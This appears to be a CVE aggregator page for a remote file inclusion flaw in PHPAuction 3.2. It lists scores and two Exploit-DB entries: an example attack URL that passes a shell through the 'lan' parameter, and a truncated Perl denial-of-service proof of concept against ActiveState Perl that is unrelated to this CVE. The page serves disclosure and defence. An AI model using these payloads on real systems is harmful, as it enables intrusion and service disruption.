CVE-2008-7000
published 2009-08-19CVE-2008-7000: PHP remote file inclusion vulnerability in index.php in PHPAuction 3.2 allows remote attackers to execute arbitrary PHP code via a URL in the lan parameter…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.05%
78.9th percentile
PHP remote file inclusion vulnerability in index.php in PHPAuction 3.2 allows remote attackers to execute arbitrary PHP code via a URL in the lan parameter. NOTE: this might be related to CVE-2005-2255.1.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpauction | phpauction | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
exploitdb·2015-09-06
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
---
# Exploit Title: [ActiveState] Perl.exe x64 Client Denial of Service (v5.20.2)
# Date: 9-3-2015
# Software Link: http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.20.2.2002/ActivePerl-5.20.2.2002-MSWin32-x64-299195.msi
# Exploit Author: Robbie Corley
# Contact: [email protected]
# Website:
# Target(s): Windows 7, Server 2008, server 2012, Windows 8.1, Windows 10
# CVE:
# Category: Denial of Service Exploits
#
# Description:
# A Denial of Service can be achieved by concatenating several large strings together and attempting to write to file.
my $buff = "\x41" x 7000;
my $endofbuff = "\x42" x 5860;
open(myfile,'>orgsched.ocf'); # file extension is irrelevant
pri
Exploit-DB
phpAuction 3.2 - 'lan' Remote File Inclusion
exploitdb·2009-09-09
CVE-2008-7000 phpAuction 3.2 - 'lan' Remote File Inclusion
phpAuction 3.2 - 'lan' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/36211/info
phpAuction is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the computer; other attacks are also possible.
phpAuction 3.2 is vulnerable; other versions may also be affected.
http://www.example.com/auction/index.php?lan=Evilshell
No writeups or analysis indexed.
2009-08-19
Published